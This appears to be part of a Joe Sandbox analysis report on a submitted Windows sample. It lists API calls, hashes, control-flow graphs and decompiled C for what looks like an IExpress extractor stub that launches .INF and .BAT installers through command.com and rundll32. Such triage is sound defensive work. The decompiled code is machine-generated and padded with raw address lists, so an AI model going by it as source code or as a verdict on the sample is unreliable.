                                                                                                                                                                                                                                                0x00053c56
                                                                                                                                                                                                                                                0x00053d35
                                                                                                                                                                                                                                                0x00053d35
                                                                                                                                                                                                                                                0x00053d3c
                                                                                                                                                                                                                                                0x00053d48
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053d48
                                                                                                                                                                                                                                                0x00053c03
                                                                                                                                                                                                                                                0x00053be2
                                                                                                                                                                                                                                                0x00053be7
                                                                                                                                                                                                                                                0x00053bee
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00053C11
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00053CDC
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546A0
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: SizeofResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546A9
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546C3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LoadResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546CC
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LockResource.KERNEL32(00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546D3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: memcpy_s.MSVCRT ref: 000546E5
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000546EF
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00058C42), ref: 00053D8F
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00053E26
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00058C42), ref: 00053EFF
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00058C42), ref: 00053F1F
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00058C42), ref: 00053F40
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00058C42), ref: 00053F47
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00058C42), ref: 00053F76
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00058C42), ref: 00053F80
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00058C42), ref: 00053FC2
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                                • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                                                                                                                                                                                                • API String ID: 1032054927-778137101
                                                                                                                                                                                                                                                • Opcode ID: c7c608287870ae938d6cea00e128bdaf5d104f3d49ddba2632fbcada01651f89
                                                                                                                                                                                                                                                • Instruction ID: bc341f5b682ab6305e22cf1ab09caf9f9374f8b7b9adc8185319fc1b9cdf84ef
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7c608287870ae938d6cea00e128bdaf5d104f3d49ddba2632fbcada01651f89
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3B1E170A083019BE7609F24D845BAB7AF4EB85783F104929FE85D61D1DB78C948CBA6
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00051AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 141 51ae8-51b2c call 51680 144 51b2e-51b39 141->144 145 51b3b-51b40 141->145 146 51b46-51b61 call 51a84 144->146 145->146 149 51b63-51b65 146->149 150 51b9f-51bc2 call 51781 call 5658a 146->150 151 51b68-51b6d 149->151 157 51bc7-51bd3 call 566c8 150->157 151->151 153 51b6f-51b74 151->153 153->150 155 51b76-51b7b 153->155 158 51b83-51b86 155->158 159 51b7d-51b81 155->159 165 51d73-51d7f call 566c8 157->165 166 51bd9-51bf1 CompareStringA 157->166 158->150 162 51b88-51b8a 158->162 159->158 161 51b8c-51b9d call 51680 159->161 161->157 162->150 162->161 175 51d81-51d99 CompareStringA 165->175 176 51df8-51e09 LocalAlloc 165->176 166->165 168 51bf7-51c07 GetFileAttributesA 166->168 170 51d53-51d5e 168->170 171 51c0d-51c15 168->171 173 51d64-51d6e call 544b9 170->173 171->170 174 51c1b-51c33 call 51a84 171->174 187 51e94-51ea4 call 56ce0 173->187 189 51c35-51c38 174->189 190 51c50-51c61 LocalAlloc 174->190 175->176 181 51d9b-51da2 175->181 178 51dd4-51ddf 176->178 179 51e0b-51e1b GetFileAttributesA 176->179 178->173 183 51e67-51e73 call 51680 179->183 184 51e1d-51e1f 179->184 186 51da5-51daa 181->186 199 51e78-51e84 call 52aac 183->199 184->183 188 51e21-51e3e call 51781 184->188 186->186 191 51dac-51db4 186->191 188->199 210 51e40-51e43 188->210 195 51c40-51c4b call 51a84 189->195 196 51c3a 189->196 190->178 198 51c67-51c72 190->198 197 51db7-51dbc 191->197 195->190 196->195 197->197 204 51dbe-51dd2 LocalAlloc 197->204 205 51c74 198->205 206 51c79-51cc0 GetPrivateProfileIntA GetPrivateProfileStringA 198->206 207 51e89-51e92 199->207 204->178 211 51de1-51df3 call 5171e 204->211 205->206 208 51cc2-51ccc 206->208 209 51cf8-51d07 206->209 207->187 212 51cd3-51cf3 call 51680 * 2 208->212 213 51cce 208->213 215 51d23 209->215 216 51d09-51d21 GetShortPathNameA 209->216 210->199 214 51e45-51e65 call 516b3 * 2 210->214 211->207 212->207 213->212 214->199 221 51d28-51d2b 215->221 216->221 224 51d32-51d4e call 5171e 221->224 225 51d2d 221->225 224->207 225->224
                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E00051AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x58004; // 0x5a679bd9
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00051680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00051A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00051781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
					E0005658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00051680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E000566C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E000566C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00051680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00051781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E000516B3( &_v1552, 0x400, " ");
										E000516B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00052AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0005171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00051A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00051A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E000544B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x59120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x51140, _t156, 8,  &_v268) == 0) {
										 *0x59a34 =  *0x59a34 & 0xfffffffb;
										if( *0x59a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0005171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x59a34 =  *0x59a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00051680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00051680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00056CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}














































                                                                                                                                                                                                                                                0x00051af3
                                                                                                                                                                                                                                                0x00051afa
                                                                                                                                                                                                                                                0x00051b07
                                                                                                                                                                                                                                                0x00051b09
                                                                                                                                                                                                                                                0x00051b1a
                                                                                                                                                                                                                                                0x00051b20
                                                                                                                                                                                                                                                0x00051b2c
                                                                                                                                                                                                                                                0x00051b3b
                                                                                                                                                                                                                                                0x00051b40
                                                                                                                                                                                                                                                0x00051b2e
                                                                                                                                                                                                                                                0x00051b2e
                                                                                                                                                                                                                                                0x00051b33
                                                                                                                                                                                                                                                0x00051b33
                                                                                                                                                                                                                                                0x00051b46
                                                                                                                                                                                                                                                0x00051b4c
                                                                                                                                                                                                                                                0x00051b52
                                                                                                                                                                                                                                                0x00051b57
                                                                                                                                                                                                                                                0x00051b5d
                                                                                                                                                                                                                                                0x00051b61
                                                                                                                                                                                                                                                0x00051b9f
                                                                                                                                                                                                                                                0x00051b9f
                                                                                                                                                                                                                                                0x00051bb1
                                                                                                                                                                                                                                                0x00051bc2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051b63
                                                                                                                                                                                                                                                0x00051b63
                                                                                                                                                                                                                                                0x00051b65
                                                                                                                                                                                                                                                0x00051b68
                                                                                                                                                                                                                                                0x00051b68
                                                                                                                                                                                                                                                0x00051b6a
                                                                                                                                                                                                                                                0x00051b6b
                                                                                                                                                                                                                                                0x00051b6f
                                                                                                                                                                                                                                                0x00051b74
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051b76
                                                                                                                                                                                                                                                0x00051b7b
                                                                                                                                                                                                                                                0x00051b86
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051b8c
                                                                                                                                                                                                                                                0x00051b8c
                                                                                                                                                                                                                                                0x00051b98
                                                                                                                                                                                                                                                0x00051bc7
                                                                                                                                                                                                                                                0x00051bc9
                                                                                                                                                                                                                                                0x00051bcc
                                                                                                                                                                                                                                                0x00051bd3
                                                                                                                                                                                                                                                0x00051d75
                                                                                                                                                                                                                                                0x00051d76
                                                                                                                                                                                                                                                0x00051d78
                                                                                                                                                                                                                                                0x00051d7f
                                                                                                                                                                                                                                                0x00051e05
                                                                                                                                                                                                                                                0x00051e09
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051e12
                                                                                                                                                                                                                                                0x00051e1b
                                                                                                                                                                                                                                                0x00051e73
                                                                                                                                                                                                                                                0x00051e21
                                                                                                                                                                                                                                                0x00051e21
                                                                                                                                                                                                                                                0x00051e28
                                                                                                                                                                                                                                                0x00051e37
                                                                                                                                                                                                                                                0x00051e3e
                                                                                                                                                                                                                                                0x00051e52
                                                                                                                                                                                                                                                0x00051e60
                                                                                                                                                                                                                                                0x00051e60
                                                                                                                                                                                                                                                0x00051e3e
                                                                                                                                                                                                                                                0x00051e79
                                                                                                                                                                                                                                                0x00051e7b
                                                                                                                                                                                                                                                0x00051e84
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051d9b
                                                                                                                                                                                                                                                0x00051d9b
                                                                                                                                                                                                                                                0x00051da0
                                                                                                                                                                                                                                                0x00051da2
                                                                                                                                                                                                                                                0x00051da5
                                                                                                                                                                                                                                                0x00051da5
                                                                                                                                                                                                                                                0x00051da7
                                                                                                                                                                                                                                                0x00051da8
                                                                                                                                                                                                                                                0x00051dac
                                                                                                                                                                                                                                                0x00051dae
                                                                                                                                                                                                                                                0x00051db4
                                                                                                                                                                                                                                                0x00051db7
                                                                                                                                                                                                                                                0x00051db7
                                                                                                                                                                                                                                                0x00051db9
                                                                                                                                                                                                                                                0x00051dba
                                                                                                                                                                                                                                                0x00051dbe
                                                                                                                                                                                                                                                0x00051dc3
                                                                                                                                                                                                                                                0x00051dce
                                                                                                                                                                                                                                                0x00051dd2
                                                                                                                                                                                                                                                0x00051deb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051df0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051dd2
                                                                                                                                                                                                                                                0x00051bf7
                                                                                                                                                                                                                                                0x00051bfe
                                                                                                                                                                                                                                                0x00051c07
                                                                                                                                                                                                                                                0x00051d55
                                                                                                                                                                                                                                                0x00051d5a
                                                                                                                                                                                                                                                0x00051d5b
                                                                                                                                                                                                                                                0x00051d5d
                                                                                                                                                                                                                                                0x00051d5e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051c1b
                                                                                                                                                                                                                                                0x00051c1b
                                                                                                                                                                                                                                                0x00051c20
                                                                                                                                                                                                                                                0x00051c2c
                                                                                                                                                                                                                                                0x00051c33
                                                                                                                                                                                                                                                0x00051c38
                                                                                                                                                                                                                                                0x00051c3a
                                                                                                                                                                                                                                                0x00051c3a
                                                                                                                                                                                                                                                0x00051c40
                                                                                                                                                                                                                                                0x00051c4b
                                                                                                                                                                                                                                                0x00051c4b
                                                                                                                                                                                                                                                0x00051c5d
                                                                                                                                                                                                                                                0x00051c61
                                                                                                                                                                                                                                                0x00051dd4
                                                                                                                                                                                                                                                0x00051dd4
                                                                                                                                                                                                                                                0x00051dd6
                                                                                                                                                                                                                                                0x00051ddb
                                                                                                                                                                                                                                                0x00051ddc
                                                                                                                                                                                                                                                0x00051dde
                                                                                                                                                                                                                                                0x00051d64
                                                                                                                                                                                                                                                0x00051d64
                                                                                                                                                                                                                                                0x00051d67
                                                                                                                                                                                                                                                0x00051d6c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051c67
                                                                                                                                                                                                                                                0x00051c67
                                                                                                                                                                                                                                                0x00051c6d
                                                                                                                                                                                                                                                0x00051c72
                                                                                                                                                                                                                                                0x00051c74
                                                                                                                                                                                                                                                0x00051c74
                                                                                                                                                                                                                                                0x00051c8e
                                                                                                                                                                                                                                                0x00051c99
                                                                                                                                                                                                                                                0x00051cc0
                                                                                                                                                                                                                                                0x00051cf8
                                                                                                                                                                                                                                                0x00051d07
                                                                                                                                                                                                                                                0x00051d23
                                                                                                                                                                                                                                                0x00051d09
                                                                                                                                                                                                                                                0x00051d14
                                                                                                                                                                                                                                                0x00051d1b
                                                                                                                                                                                                                                                0x00051d1b
                                                                                                                                                                                                                                                0x00051d2b
                                                                                                                                                                                                                                                0x00051d2d
                                                                                                                                                                                                                                                0x00051d2d
                                                                                                                                                                                                                                                0x00051d38
                                                                                                                                                                                                                                                0x00051d39
                                                                                                                                                                                                                                                0x00051d46
                                                                                                                                                                                                                                                0x00051cc2
                                                                                                                                                                                                                                                0x00051cc2
                                                                                                                                                                                                                                                0x00051ccc
                                                                                                                                                                                                                                                0x00051cce
                                                                                                                                                                                                                                                0x00051cce
                                                                                                                                                                                                                                                0x00051cdb
                                                                                                                                                                                                                                                0x00051ce6
                                                                                                                                                                                                                                                0x00051cee
                                                                                                                                                                                                                                                0x00051cee
                                                                                                                                                                                                                                                0x00051e89
                                                                                                                                                                                                                                                0x00051e91
                                                                                                                                                                                                                                                0x00051e92
                                                                                                                                                                                                                                                0x00051e94
                                                                                                                                                                                                                                                0x00051e97
                                                                                                                                                                                                                                                0x00051ea4
                                                                                                                                                                                                                                                0x00051ea4
                                                                                                                                                                                                                                                0x00051c61
                                                                                                                                                                                                                                                0x00051c07
                                                                                                                                                                                                                                                0x00051bd3
                                                                                                                                                                                                                                                0x00051b7b

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00051BE7
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00051BFE
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00051C57
                                                                                                                                                                                                                                                • GetPrivateProfileIntA.KERNEL32 ref: 00051C88
                                                                                                                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00051140,00000000,00000008,?), ref: 00051CB8
                                                                                                                                                                                                                                                • GetShortPathNameA.KERNEL32 ref: 00051D1B
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00054518
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00054554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                                • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                                • API String ID: 383838535-3368923722
                                                                                                                                                                                                                                                • Opcode ID: ff392c2839d3a2dd661d972d7820116a788a1aff0856b54bc67bc63429927fd0
                                                                                                                                                                                                                                                • Instruction ID: 70fb2b808f1250683bc2504fa23536ee63f979925a2d475f572fab19cc1088c8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff392c2839d3a2dd661d972d7820116a788a1aff0856b54bc67bc63429927fd0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53A17870A002186BEF609B24CC45FEB77B9DB85312F144294ED55A72C1DBB49ECDCB64
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0005597D Relevance: 19.7, APIs: 13, Instructions: 212windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 324 5597d-559b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 559dd-55a1b GetDiskFreeSpaceA 324->325 326 559bb-559d8 call 544b9 call 56285 324->326 328 55ba1-55bde memset call 56285 GetLastError FormatMessageA 325->328 329 55a21-55a4a MulDiv 325->329 341 55c05-55c14 call 56ce0 326->341 338 55be3-55bfc call 544b9 SetCurrentDirectoryA 328->338 329->328 332 55a50-55a6c GetVolumeInformationA 329->332 335 55ab5-55aca SetCurrentDirectoryA 332->335 336 55a6e-55ab0 memset call 56285 GetLastError FormatMessageA 332->336 340 55acc-55ad1 335->340 336->338 352 55c02 338->352 344 55ad3-55ad8 340->344 345 55ae2-55ae4 340->345 344->345 347 55ada-55ae0 344->347 349 55ae7-55af8 345->349 350 55ae6 345->350 347->340 347->345 351 55af9-55afb 349->351 350->349 354 55b05-55b08 351->354 355 55afd-55b03 351->355 356 55c04 352->356 357 55b20-55b27 354->357 358 55b0a-55b1b call 544b9 354->358 355->351 355->354 356->341 360 55b52-55b5b 357->360 361 55b29-55b33 357->361 358->352 364 55b62-55b6d 360->364 361->360 363 55b35-55b50 361->363 363->364 365 55b76-55b7d 364->365 366 55b6f-55b74 364->366 368 55b83 365->368 369 55b7f-55b81 365->369 367 55b85 366->367 370 55b87-55b94 call 5268b 367->370 371 55b96-55b9f 367->371 368->367 369->367 370->356 371->356
                                                                                                                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                                                                                                                			E0005597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x58004; // 0x5a679bd9
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x59124 = E00056285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E000544B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x59a34 & 0x00000008;
							if(( *0x59a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x59a38; // 0x0
								_t110 =  *((intOrPtr*)(0x589e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x59124 = 0;
									_t66 = 1;
								} else {
									_t66 = E0005268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
